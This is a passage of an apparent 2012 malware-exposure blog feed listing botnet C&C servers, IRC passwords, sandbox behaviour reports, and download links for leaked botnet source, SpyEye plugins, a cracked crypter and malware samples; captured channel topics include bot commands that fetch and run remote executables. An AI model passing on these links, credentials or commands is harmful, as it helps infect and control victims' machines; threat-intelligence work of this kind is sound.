type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/1551161045575408148'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/1551161045575408148'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2012/01/174140165107irc-botnet-hosted-in-united.html' title='174.140.165.107(irc botnet hosted in United States Portland Directspace Networks Llc)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-5902049469440316292</id><published>2012-01-10T19:53:00.004+01:00</published><updated>2012-01-10T20:00:39.684+01:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vOlk HTTP Botnet - [+]Pharming ★ [ver 4.0]'/><title type='text'>vOlk HTTP Botnet - [+]Pharming ★ [ver 4.0] (VB Source)</title><content type='html'>Another HTTP malware (currently for sell in heckers board)&lt;br /&gt;Source leaked to public (have to say is very bad and VB language so u have to be a real hecker to spend 35$ for this garbage)&lt;br /&gt;Source may be in handy to  AV Companies lol&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://s18.postimage.org/l6tq4yk0p/Wolk_Botnet.png" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="240" width="102" src="http://s18.postimage.org/l6tq4yk0p/Wolk_Botnet.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Download it &lt;a href="http://www.secret-zone.net/threads/4212-vOlk-HTTP-Botnet-Pharming-★-ver-4-0-(VB-Source)?p=4569#post4569"&gt;here&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-5902049469440316292?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/5902049469440316292/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2012/01/volk-http-botnet-pharming-ver-40-vb.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/5902049469440316292'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/5902049469440316292'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2012/01/volk-http-botnet-pharming-ver-40-vb.html' title='vOlk HTTP Botnet - [+]Pharming ★ [ver 4.0] (VB Source)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-8827059095599642336</id><published>2012-01-09T22:06:00.001+01:00</published><updated>2012-01-09T22:16:14.067+01:00</updated><title type='text'>proxysafe.mrkva.su(irc botnet hosted in Netherlands Dediserv Dedicated Servers Sp. Z O.o)</title><content type='html'>This is another reptile mod wich spreads better then ngrBot wich is more famous because being for sell around&lt;br /&gt;&lt;br /&gt;proxysafe.mrkva.su 212.7.214.43&lt;br /&gt;&lt;br /&gt;C&amp;C Server: 212.7.214.43:2345&lt;br /&gt;Server Password: &lt;br /&gt;Username: x&lt;br /&gt;Nickname: n[DEU|XP]7480782&lt;br /&gt;Channel: #!proxy! (Password: ) &lt;br /&gt;Channeltopic:&lt;br /&gt;&lt;br /&gt;exe file for analysis:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://c9e19b1b.tinylinks.co"&gt;Download&lt;/a&gt;&lt;br /&gt;&lt;a href="http://909d6e97.urlbeat.net"&gt;Download1&lt;/a&gt;&lt;br /&gt;&lt;a href="http://2ab9223e.theseblogs.com"&gt;Download2&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/212.7.214.43&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-8827059095599642336?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/8827059095599642336/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2012/01/proxysafemrkvasuirc-botnet-hosted-in.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/8827059095599642336'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/8827059095599642336'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2012/01/proxysafemrkvasuirc-botnet-hosted-in.html' title='proxysafe.mrkva.su(irc botnet hosted in Netherlands Dediserv Dedicated Servers Sp. Z O.o)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-1603915153795598150</id><published>2012-01-08T01:11:00.005+01:00</published><updated>2012-01-08T02:30:46.112+01:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='ColdSeal 5.4.1 Ultimate Release--FWB++ CRACKED'/><title type='text'>ColdSeal 5.4.1 Ultimate Release--FWB++ CRACKED</title><content type='html'>About the "coder"&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-cA7t3mEyJTU/TwjbwjeJgLI/AAAAAAAAAKs/8m-wQQfLiP8/s1600/AboutColdSealCODER.png" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="150" width="200" src="http://2.bp.blogspot.com/-cA7t3mEyJTU/TwjbwjeJgLI/AAAAAAAAAKs/8m-wQQfLiP8/s200/AboutColdSealCODER.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;About ColdSeal Cryptor&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-jPvQAQa96dQ/TwjcNUxvE2I/AAAAAAAAAK4/x9q0UE0xEr8/s1600/AboutColdSeal.png" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="150" width="200" src="http://3.bp.blogspot.com/-jPvQAQa96dQ/TwjcNUxvE2I/AAAAAAAAAK4/x9q0UE0xEr8/s200/AboutColdSeal.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;ColdSeal Cryptor&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-eE_7vomdoVs/TwjcbHl3ACI/AAAAAAAAALE/UoJ0iGSAg7o/s1600/Cold%2524eal.png" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="150" width="200" src="http://2.bp.blogspot.com/-eE_7vomdoVs/TwjcbHl3ACI/AAAAAAAAALE/UoJ0iGSAg7o/s200/Cold%2524eal.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-46cdiRTp9cM/TwjcrW3v-FI/AAAAAAAAALQ/riZZRiLMW84/s1600/Cold%2524eal1.png" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="150" width="200" src="http://3.bp.blogspot.com/-46cdiRTp9cM/TwjcrW3v-FI/AAAAAAAAALQ/riZZRiLMW84/s200/Cold%2524eal1.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-Z1szAabdZ4g/Twjc7fy8YUI/AAAAAAAAALc/0jFRtWJ4j7o/s1600/Cold%2524eal2.png" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="150" width="200" src="http://4.bp.blogspot.com/-Z1szAabdZ4g/Twjc7fy8YUI/AAAAAAAAALc/0jFRtWJ4j7o/s200/Cold%2524eal2.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-yNs85IPeBx4/TwjdQcNgL4I/AAAAAAAAALo/8wtQbYqR2Qc/s1600/Cold%2524eal3.png" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="150" width="200" src="http://4.bp.blogspot.com/-yNs85IPeBx4/TwjdQcNgL4I/AAAAAAAAALo/8wtQbYqR2Qc/s200/Cold%2524eal3.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-XOQdeAx7wi0/Twjdge8JivI/AAAAAAAAAL0/MZXPR0XUgNo/s1600/Cold%2524eal4.png" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="150" width="200" src="http://1.bp.blogspot.com/-XOQdeAx7wi0/Twjdge8JivI/AAAAAAAAAL0/MZXPR0XUgNo/s200/Cold%2524eal4.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-kUHtKVP2kcQ/Twjd2DRrbqI/AAAAAAAAAMA/YlofLGqtWrA/s1600/5Cold%2524eal.png" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="150" width="200" src="http://2.bp.blogspot.com/-kUHtKVP2kcQ/Twjd2DRrbqI/AAAAAAAAAMA/YlofLGqtWrA/s200/5Cold%2524eal.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;this guy claim to be computer engineer ...lol&lt;br /&gt;The tool is used mainly to protect malwares like RAT's,Bots,Trojans&lt;br /&gt;alot of hf hecker's are buying this and this "coder" is making alot of money from this dirty busines&lt;br /&gt;&lt;br /&gt;Price:&lt;br /&gt;&lt;br /&gt;Pay to Account U2903909 (ToXiiC) via LR&lt;br /&gt;&lt;br /&gt;Amount $70.00 very high price for this crap&lt;br /&gt;&lt;br /&gt;&lt;a href="http://cold-seal.net/"&gt;Author's website&lt;/a&gt; &lt;br /&gt;&lt;br /&gt;&lt;a href="http://ac43b4fc.theseforums.com"&gt;ColdSeal CRACKED&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.crocko.com/13D33711BA8C46408468D26BEE5F71EC/Cold$eal.zip"&gt;ColdSeal CRACKED1&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-1603915153795598150?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/1603915153795598150/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2012/01/coldseal-541-ultimate-release-fwb.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/1603915153795598150'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/1603915153795598150'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2012/01/coldseal-541-ultimate-release-fwb.html' title='ColdSeal 5.4.1 Ultimate Release--FWB++ CRACKED'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/-cA7t3mEyJTU/TwjbwjeJgLI/AAAAAAAAAKs/8m-wQQfLiP8/s72-c/AboutColdSealCODER.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-1855435870253830736</id><published>2012-01-08T00:00:00.000+01:00</published><updated>2012-01-08T00:00:20.245+01:00</updated><title type='text'>Downloader.Generic, Downloader, Trojan.Win32.Scar.rfw, BackDoor-DKA(hosted in United States Vpls Inc. D/b/a Krypt Technologies)</title><content type='html'>Interessing malware &lt;br /&gt;&lt;br /&gt;here some infos i got from the exe:&lt;br /&gt;&lt;br /&gt;a.ip-163.com  DNS_TYPE_A  174.139.61.74 &lt;br /&gt;&lt;br /&gt;what it does:&lt;br /&gt;&lt;br /&gt;Write to foreign memory areas: This executable tampers with the execution of another process.   &lt;br /&gt;Performs File Modification and Destruction: The executable modifies and destructs files which are not temporary.   &lt;br /&gt;Start/Install windows service: This executable starts a windows service. Services have the highest level of privilege in Windows, and are thus useful for a number of malicious purposes.   &lt;br /&gt;Autostart capabilities: This executable registers processes to be executed at system start. This could result in unwanted actions to be performed automatically.   &lt;br /&gt;Creates files in the Windows system directory: Malware often keeps copies of itself in the Windows directory to stay undetected by users.   &lt;br /&gt;Execution did not terminate correctly: The executable crashed.   &lt;br /&gt;Modify system files: This executable modifies files in the windows system directories.   &lt;br /&gt;Spawns Processes: The executable produces processes during the execution.   &lt;br /&gt;Performs Registry Activities: The executable creates and/or modifies registry entries.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://8000395b.theseblogs.com"&gt;exe file if someone want to search inside&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/174.139.61.74&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-1855435870253830736?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/1855435870253830736/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2012/01/downloadergeneric-downloader.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/1855435870253830736'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/1855435870253830736'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2012/01/downloadergeneric-downloader.html' title='Downloader.Generic, Downloader, Trojan.Win32.Scar.rfw, BackDoor-DKA(hosted in United States Vpls Inc. D/b/a Krypt Technologies)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-9137669108318095504</id><published>2012-01-05T20:28:00.000+01:00</published><updated>2012-01-05T20:28:49.687+01:00</updated><title type='text'>31.186.102.186(irc botnet hosted in Russian Federation Selectel Ltd)</title><content type='html'>Remote Host Port Number&lt;br /&gt;199.15.234.7 80&lt;br /&gt;31.186.102.186 8765 PASS secret&lt;br /&gt;&lt;br /&gt;NICK n{US|XPa}vhxkqvn&lt;br /&gt;USER vhxkqvn 0 0 :vhxkqvn&lt;br /&gt;JOIN #GODS secret&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/31.186.102.186&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-9137669108318095504?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/9137669108318095504/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2012/01/31186102186irc-botnet-hosted-in-russian.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/9137669108318095504'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/9137669108318095504'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2012/01/31186102186irc-botnet-hosted-in-russian.html' title='31.186.102.186(irc botnet hosted in Russian Federation Selectel Ltd)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-5729318476508604692</id><published>2012-01-04T00:43:00.006+01:00</published><updated>2012-01-04T14:05:15.542+01:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='SpyEye Plugins'/><title type='text'>SpyEye Plugins</title><content type='html'>Here some plugins used from the celebre malware SpyEye&lt;br /&gt;found by formatme and allready public into russian forums&lt;br /&gt;Reversing guys will have good time with this package&lt;br /&gt;Guess what ? Theyre backdoored like everything leaked to public so be carefull&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://s17.postimage.org/agc5u6hjz/Spy_Eye_Plugins.png" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="467" width="669" src="http://s17.postimage.org/agc5u6hjz/Spy_Eye_Plugins.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://12c3f89c.tinylinks.co/"&gt;Download&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-5729318476508604692?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/5729318476508604692/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2012/01/spyeye-plugins.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/5729318476508604692'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/5729318476508604692'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2012/01/spyeye-plugins.html' title='SpyEye Plugins'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-5958828555436789483</id><published>2012-01-03T20:52:00.001+01:00</published><updated>2012-01-28T20:13:20.131+01:00</updated><title type='text'>www.merkurvideo.com(irc botnet hosted in Turkey Radore Hosting Telekomunikasyon Hizmetleri San. Ve Tic. Ltd. Sti)</title><content type='html'>Domains used to control bots:&lt;br /&gt;www.facebookvideocentral.com 46.45.164.166&lt;br /&gt;www.merkurvideo.com 46.45.164.166 &lt;br /&gt;www.pr0.net 74.206.242.164&lt;br /&gt;&lt;br /&gt;C&amp;C Server: 46.45.164.166:81&lt;br /&gt;Server Password: &lt;br /&gt;Username: SP3-431&lt;br /&gt;Nickname: [00_DEU_XP_6037696]&lt;br /&gt;Channel: #i (Password: ) &lt;br /&gt;Channeltopic: :.asc -S -s |.http http://46.45.164.165/iii.exe |.asc exp_all 15 5 0 -c -e |.asc exp_all 15 5 0 -b -r -e |.asc exp_all 15 5 0 -c |.asc exp_all 10 5 0 -a -r -e |.asc exp_all 10 5 0 -c -e&lt;br /&gt;&lt;br /&gt;UPDATE:&lt;br /&gt;www.facebookvideocentral.com 46.45.164.166&lt;br /&gt;www.merkurvideo.com 46.45.164.166&lt;br /&gt;www.pr0.net &lt;br /&gt;www.pr0.net 74.206.242.164&lt;br /&gt;Download URLs&lt;br /&gt; http://74.206.242.164/deny2/azenv.php (www.pr0.net) &lt;br /&gt; http://74.206.242.164/deny2/azenv.php (www.pr0.net) &lt;br /&gt; http://74.206.242.164/deny2/azenv.php (www.pr0.net) &lt;br /&gt; http://74.206.242.164/deny2/azenv.php (www.pr0.net) &lt;br /&gt;&lt;br /&gt; C&amp;C Server: 46.45.164.166:81&lt;br /&gt; Server Password: &lt;br /&gt; Username: SP3-978&lt;br /&gt; Nickname: [N00_DEU_XP_1776942]Ð_CHAR(0x05)_A&lt;br /&gt; Channel: (Password: ) &lt;br /&gt; Channeltopic: &lt;br /&gt; C&amp;C Server: 46.45.164.166:81&lt;br /&gt; Server Password: &lt;br /&gt; Username: SP3-361&lt;br /&gt; Nickname: [00_DEU_XP_6980600]&lt;br /&gt; Channel: #k (Password: ) &lt;br /&gt; Channeltopic: :.asc -S -s |.http http://46.45.164.165/kk.exe |.asc exp_all 15 5 0 -c -e |.asc exp_all 15 5 0 -b -r -e |.asc exp_all 15 5 0 -c |.asc exp_all 10 5 0 -a -r -e |.asc exp_all 10 5 0 -c -e&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/46.45.164.164&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-5958828555436789483?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/5958828555436789483/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2012/01/wwwmerkurvideocomirc-botnet-hosted-in.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/5958828555436789483'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/5958828555436789483'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2012/01/wwwmerkurvideocomirc-botnet-hosted-in.html' title='www.merkurvideo.com(irc botnet hosted in Turkey Radore Hosting Telekomunikasyon Hizmetleri San. Ve Tic. Ltd. Sti)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-5813078221332264483</id><published>2012-01-03T19:47:00.001+01:00</published><updated>2012-01-04T20:25:44.939+01:00</updated><title type='text'>xL.x1x2.in(ngrBot hosted in France Paris Gandi)</title><content type='html'>Resolved : [xL.x1x2.in] To [95.142.167.131]port 4949 for irc&lt;br /&gt;Resolved : [xL.x1x2.in] To [95.142.166.253]port 4949 for irc&lt;br /&gt;Resolved : [xL.x1x2.in] To [92.243.15.137]port 4949 for irc&lt;br /&gt;Resolved : [xL.x1x2.in] To [103.1.184.45]port 4949 for irc&lt;br /&gt;&lt;br /&gt;Remote Host Port Number&lt;br /&gt;176.9.42.247 8332 Bitcoin Malware&lt;br /&gt;&lt;br /&gt;199.15.234.7 80&lt;br /&gt;&lt;br /&gt;199.7.176.144 80&lt;br /&gt;&lt;br /&gt;199.7.177.228 80&lt;br /&gt;&lt;br /&gt;74.120.10.153 80&lt;br /&gt;&lt;br /&gt;74.120.8.161 80&lt;br /&gt;&lt;br /&gt;95.142.167.131 4949 irc port (before he used port 5900)u need password for conection in this botnet&lt;br /&gt;is not so hard for people wo really want to join there geting the passwd lol&lt;br /&gt;&lt;br /&gt;The data identified by the following URLs was then requested from the remote web server:&lt;br /&gt;http://api.wipmania.com/&lt;br /&gt;http://s481.hotfile.com/get/c7beee1329db43f39cc1d9b0df90a2fb0f227c7a/4f0345cd/2/eee0664170e0751b/84a4dcc/minerv4.exe&lt;br /&gt;http://hotfile.com/dl/139063723/171a7fe/skkill.exe&lt;br /&gt;http://hotfile.com/dl/139087308/808d704/minerv4.exe&lt;br /&gt;http://hotfile.com/dl/138785531/af1c0bc/botxxxx1-2.exe&lt;br /&gt;http://s332.hotfile.com/get/d414aca6e80162025fc78a0e2659aa1fc8727ab7/4f0345cb/2/1bdccba2084518fe/849f1ab/skkill.exe&lt;br /&gt;http://s82.hotfile.com/get/58bcf25a8d53349f0da7e8bf9b40b69ad8d07d24/4f0345cf/2/94fdacb608286eb7/845b2fb/botxxxx1-2.exe&lt;br /&gt;&lt;br /&gt;just in case the hecker send abuse to hotfile or he remove exe files here u have them all:&lt;br /&gt;&lt;a href="http://4f57296b.ultrafiles.net"&gt;Download&lt;/a&gt;&lt;br /&gt;&lt;a href="http://596c9745.urlbeat.net"&gt;Download&lt;/a&gt;&lt;br /&gt;&lt;a href="http://ce47a92e.whackyvidz.com"&gt;Download&lt;/a&gt;&lt;br /&gt;&lt;a href="http://713c77b2.ultrafiles.net"&gt;Download&lt;/a&gt;&lt;br /&gt;&lt;a href="http://9646ca9c.theseblogs.com"&gt;Download&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;feel free to post here any infos about botnet server,chanels etc if u find more&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-5813078221332264483?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/5813078221332264483/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2012/01/xlx1x2inngrbot-hosted-in-france-paris.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/5813078221332264483'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/5813078221332264483'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2012/01/xlx1x2inngrbot-hosted-in-france-paris.html' title='xL.x1x2.in(ngrBot hosted in France Paris Gandi)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-4372225152478796214</id><published>2012-01-03T19:34:00.000+01:00</published><updated>2012-01-03T19:34:40.557+01:00</updated><title type='text'>118.69.220.81(irc botnet hosted in Viet Nam Ip Range For Xdsl Iptv Fixed Phone Service At Hcmc)</title><content type='html'>Remote Host Port Number&lt;br /&gt;118.69.220.81 6667 PASS weed&lt;br /&gt;&lt;br /&gt;Clients: I have 110 clients and 0 servers&lt;br /&gt;Local users: Current Local Users: 110 Max: 115&lt;br /&gt;Global users: Current Global Users: 110 Max: 115&lt;br /&gt;&lt;br /&gt;MODE [00|USA|XP|SP2]-8799 +x&lt;br /&gt;JOIN ##vam## vampir123&lt;br /&gt;USERHOST [00|USA|XP|SP2]-8799&lt;br /&gt;PONG :Vampir.hack-mx.ru.net&lt;br /&gt;NICK [00|USA|XP|SP2]-8799&lt;br /&gt;USER pmlai 0 0 :[00|USA|XP|SP2]-8799&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/118.69.220.81&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-4372225152478796214?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/4372225152478796214/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2012/01/1186922081irc-botnet-hosted-in-viet-nam.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/4372225152478796214'/><link rel='self' type='application/atom+xml' 